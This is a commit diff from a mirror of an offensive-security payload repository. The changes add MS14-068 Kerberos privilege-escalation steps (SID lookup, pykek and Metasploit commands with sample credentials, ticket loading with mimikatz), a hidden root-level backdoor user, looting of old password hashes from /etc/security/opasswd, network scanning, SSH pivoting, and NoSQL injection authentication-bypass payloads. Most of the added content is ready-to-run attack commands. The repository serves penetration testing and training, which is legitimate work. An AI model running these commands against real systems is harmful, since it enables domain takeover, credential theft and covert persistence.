mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
MS14-068 + /etc/security/opasswd
This commit is contained in:
parent
3b85f1b6fc
commit
144b3827ab
@ -101,23 +101,73 @@
|
||||
|
||||
### MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)
|
||||
|
||||
```bash
|
||||
Exploit Python: https://www.exploit-db.com/exploits/35474/
|
||||
Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068
|
||||
Metasploit: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
|
||||
This exploit require to know the user SID, you can use `rpcclient` to remotely get it or `wmi` if you have an access on the machine.
|
||||
|
||||
git clone https://github.com/bidord/pykek
|
||||
```powershell
|
||||
# remote
|
||||
rpcclient $> lookupnames john.smith
|
||||
john.smith S-1-5-21-2923581646-3335815371-2872905324-1107 (User: 1)
|
||||
|
||||
# loc
|
||||
wmic useraccount get name,sid
|
||||
Administrator S-1-5-21-3415849876-833628785-5197346142-500
|
||||
Guest S-1-5-21-3415849876-833628785-5197346142-501
|
||||
Administrator S-1-5-21-297520375-2634728305-5197346142-500
|
||||
Guest S-1-5-21-297520375-2634728305-5197346142-501
|
||||
krbtgt S-1-5-21-297520375-2634728305-5197346142-502
|
||||
lambda S-1-5-21-297520375-2634728305-5197346142-1110
|
||||
```
|
||||
|
||||
```bash
|
||||
Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068
|
||||
```
|
||||
|
||||
Generate a ticket with `metasploit` or `pykek`
|
||||
|
||||
```powershell
|
||||
Metasploit: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
DOMAIN LABDOMAIN.LOCAL yes The Domain (upper case) Ex: DEMO.LOCAL
|
||||
PASSWORD P@ssw0rd yes The Domain User password
|
||||
RHOSTS 10.10.10.10 yes The target address range or CIDR identifier
|
||||
RPORT 88 yes The target port
|
||||
Timeout 10 yes The TCP timeout to establish connection and read data
|
||||
USER lambda yes The Domain User
|
||||
USER_SID S-1-5-21-297520375-2634728305-5197346142-1106 yes The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000
|
||||
```
|
||||
|
||||
```powershell
|
||||
# https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek
|
||||
git clone https://github.com/SecWiki/windows-kernel-exploits
|
||||
python ./ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> -p <clearPassword>
|
||||
python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org
|
||||
python ./ms14-068.py -u john.smith@pwn3d.local -s S-1-5-21-2923581646-3335815371-2872905324-1107 -d 192.168.115.10
|
||||
```
|
||||
|
||||
Then use `mimikatz` to load the ticket.
|
||||
|
||||
```powershell
|
||||
mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache"
|
||||
```
|
||||
|
||||
:warning: If the clock is skewed use `clock-skew.nse` script from `nmap`
|
||||
|
||||
```powershell
|
||||
$ nmap -sV -sC 10.10.10.10
|
||||
clock-skew: mean: -1998d09h03m04s, deviation: 4h00m00s, median: -1998d11h03m05s
|
||||
|
||||
$ sudo date -s "14 APR 2015 18:25:16"
|
||||
```
|
||||
|
||||
|
||||
### Open Shares
|
||||
|
||||
```powershell
|
||||
smbmap -H 10.10.10.100 # null session
|
||||
smbmap -H 10.10.10.100 -R # recursive listing
|
||||
smbmap -H 10.10.10.100 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18
|
||||
smbmap -H 10.10.10.10 # null session
|
||||
smbmap -H 10.10.10.10 -R # recursive listing
|
||||
smbmap -H 10.10.10.10 -u invaliduser # guest smb session
|
||||
smbmap -H 10.10.10.10 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18
|
||||
```
|
||||
|
||||
or
|
||||
@ -653,4 +703,5 @@ Most of the time the best passwords to spray are :
|
||||
* [Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv - Thursday, January 31, 2019 - Dave](http://blog.redxorblue.com/2019/01/red-teaming-made-easy-with-exchange.html)
|
||||
* [Chump2Trump - AD Privesc talk at WAHCKon 2017 - @l0ss](https://github.com/l0ss/Chump2Trump/blob/master/ChumpToTrump.pdf)
|
||||
* [Post-OSCP Series Part 2 - Kerberoasting - 16 APRIL 2019 - Jon Hickman](https://0metasecurity.com/post-oscp-part-2/)
|
||||
* [WHAT’S SPECIAL ABOUT THE BUILTIN ADMINISTRATOR ACCOUNT? - 21/05/2012 - MORGAN SIMONSEN](https://morgansimonsen.com/2012/05/21/whats-special-about-the-builtin-administrator-account-12/)
|
||||
* [WHAT’S SPECIAL ABOUT THE BUILTIN ADMINISTRATOR ACCOUNT? - 21/05/2012 - MORGAN SIMONSEN](https://morgansimonsen.com/2012/05/21/whats-special-about-the-builtin-administrator-account-12/)
|
||||
* [Exploiting MS14-068 with PyKEK and Kali - 14 DEC 2014 - ZACH GRACE @ztgrace](https://zachgrace.com/posts/exploiting-ms14-068/)
|
@ -29,6 +29,7 @@ ncat --tcp -lvp 4242
|
||||
```powershell
|
||||
sudo useradd -ou 0 -g 0 john
|
||||
sudo passwd john
|
||||
echo "linuxpassword" | passwd --stdin john
|
||||
```
|
||||
|
||||
## Suid Binary
|
||||
|
@ -15,6 +15,7 @@
|
||||
* [Checklist](#checklist)
|
||||
* [Looting for passwords](#looting-for-passwords)
|
||||
* [Files containing passwords](#files-containing-passwords)
|
||||
* [Old passwords in /etc/security/opasswd](#old-passwords-in--etc-security-opasswd)
|
||||
* [Last edited files](#last-edited-files)
|
||||
* [In memory passwords](#in-memory-passwords)
|
||||
* [Find sensitive files](#find-sensitive-files)
|
||||
@ -133,6 +134,13 @@ grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
|
||||
find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;
|
||||
```
|
||||
|
||||
### Old passwords in /etc/security/opasswd
|
||||
|
||||
The `/etc/security/opasswd` file is used also by pam_cracklib to keep the history of old passwords so that the user will not reuse them.
|
||||
|
||||
:warning: Treat your opasswd file like your /etc/shadow file because it will end up containing user password hashes
|
||||
|
||||
|
||||
### Last edited files
|
||||
|
||||
Files that were edited in the last 10 minutes
|
||||
@ -614,4 +622,5 @@ https://www.exploit-db.com/exploits/18411
|
||||
- [HOW TO EXPLOIT WEAK NFS PERMISSIONS THROUGH PRIVILEGE ESCALATION? - APRIL 25, 2018](https://www.securitynewspaper.com/2018/04/25/use-weak-nfs-permissions-escalate-linux-privileges/)
|
||||
- [Privilege Escalation via lxd - @reboare](https://reboare.github.io/lxd/lxd-escape.html)
|
||||
- [Editing /etc/passwd File for Privilege Escalation - Raj Chandel - MAY 12, 2018](https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/)
|
||||
- [Privilege Escalation by injecting process possessing sudo tokens - @nongiach @chaignc](https://github.com/nongiach/sudo_inject)
|
||||
- [Privilege Escalation by injecting process possessing sudo tokens - @nongiach @chaignc](https://github.com/nongiach/sudo_inject)
|
||||
* [Linux Password Security with pam_cracklib - Hal Pomeranz, Deer Run Associates](http://www.deer-run.com/~hal/sysadmin/pam_cracklib.html)
|
@ -102,6 +102,9 @@ List Nmap scripts : ls /usr/share/nmap/scripts/
|
||||
```powershell
|
||||
masscan -iL ips-online.txt --rate 10000 -p1-65535 --only-open -oL masscan.out
|
||||
masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000
|
||||
|
||||
masscan --rate 500 --interface tap0 --router-ip $ROUTER_IP --top-ports 100 $NETWORK -oL masscan_machines.tmp
|
||||
masscan --rate 1000 --interface tap0 --router-ip $ROUTER_IP -p1-65535,U:1-65535 $MACHINE_IP --banners -oL $MACHINE_IP/scans/masscan-ports.lst
|
||||
```
|
||||
|
||||
## Reconnoitre
|
||||
|
@ -138,7 +138,15 @@ route flush
|
||||
|
||||
## sshuttle
|
||||
|
||||
Transparent proxy server that works as a poor man's VPN. Forwards over ssh.
|
||||
|
||||
* Doesn't require admin.
|
||||
* Works with Linux and MacOS.
|
||||
* Supports DNS tunneling.
|
||||
|
||||
```powershell
|
||||
pacman -Sy sshuttle
|
||||
apt-get install sshuttle
|
||||
sshuttle -vvr user@10.10.10.10 10.1.1.0/24
|
||||
sshuttle -vvr username@pivot_host 10.2.2.0/24
|
||||
```
|
||||
|
@ -1,9 +1,28 @@
|
||||
# NoSQL injection
|
||||
|
||||
NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax.
|
||||
> NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax.
|
||||
|
||||
## Summary
|
||||
|
||||
* [Tools](#tools)
|
||||
* [Exploit](exploits)
|
||||
* [Authentication Bypass](#authentication-bypass)
|
||||
* [Extract length information](#extract-length-information)
|
||||
* [Extract data information](#extract-data-information)
|
||||
* [Blind NoSQL](#blind-nosql)
|
||||
* [POST with JSON body](#post-with-json-body)
|
||||
* [GET](#get)
|
||||
* [MongoDB Payloads](#mongodb-payloads)
|
||||
* [References](#references)
|
||||
|
||||
## Tools
|
||||
|
||||
* [NoSQLmap - Automated NoSQL database enumeration and web application exploitation tool](https://github.com/codingo/NoSQLMap)
|
||||
|
||||
## Exploit
|
||||
|
||||
### Authentication Bypass
|
||||
|
||||
Basic authentication bypass using not equal ($ne) or greater ($gt)
|
||||
|
||||
```json
|
||||
@ -17,14 +36,14 @@ in JSON
|
||||
{"username": {"$gt":""}, "password": {"$gt":""}}
|
||||
```
|
||||
|
||||
Extract length information
|
||||
### Extract length information
|
||||
|
||||
```json
|
||||
username[$ne]=toto&password[$regex]=.{1}
|
||||
username[$ne]=toto&password[$regex]=.{3}
|
||||
```
|
||||
|
||||
Extract data information
|
||||
### Extract data information
|
||||
|
||||
```json
|
||||
in URL
|
||||
@ -124,5 +143,5 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
|
||||
|
||||
* [Les NOSQL injections Classique et Blind: Never trust user input - Geluchat](https://www.dailysecurity.fr/nosql-injections-classique-blind/)
|
||||
* [Testing for NoSQL injection - OWASP](https://www.owasp.org/index.php/Testing_for_NoSQL_injection)
|
||||
* [cr0hn - NoSQL injection wordlists](https://github.com/cr0hn/nosqlinjection_wordlists)
|
||||
* [Zanon - NoSQL Injection in MongoDB](https://zanon.io/posts/nosql-injection-in-mongodb)
|
||||
* [NoSQL injection wordlists - cr0hn](https://github.com/cr0hn/nosqlinjection_wordlists)
|
||||
* [NoSQL Injection in MongoDB - JUL 17, 2016 - Zanon](https://zanon.io/posts/nosql-injection-in-mongodb)
|
||||
|
@ -217,7 +217,7 @@ http://127.1.1.1:80:\@@127.2.2.2:80/
|
||||
http://127.1.1.1:80#\@127.2.2.2:80/
|
||||
```
|
||||
|
||||
![https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/Images/SSRF_Parser.png](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20Injection/Images/WeakParser.jpg)
|
||||
![https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/SSRF_Parser.png?raw=true](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.jpg?raw=true)
|
||||
|
||||
|
||||
## SSRF exploitation via URL Scheme
|
||||
@ -243,7 +243,7 @@ ssrf.php?url=http://127.0.0.1:80
|
||||
ssrf.php?url=http://127.0.0.1:443
|
||||
```
|
||||
|
||||
![SSRF stream](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20Injection/Images/SSRF_stream.png)
|
||||
![SSRF stream](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/SSRF_stream.png?raw=true)
|
||||
|
||||
The following URL scheme can be used to probe the network
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user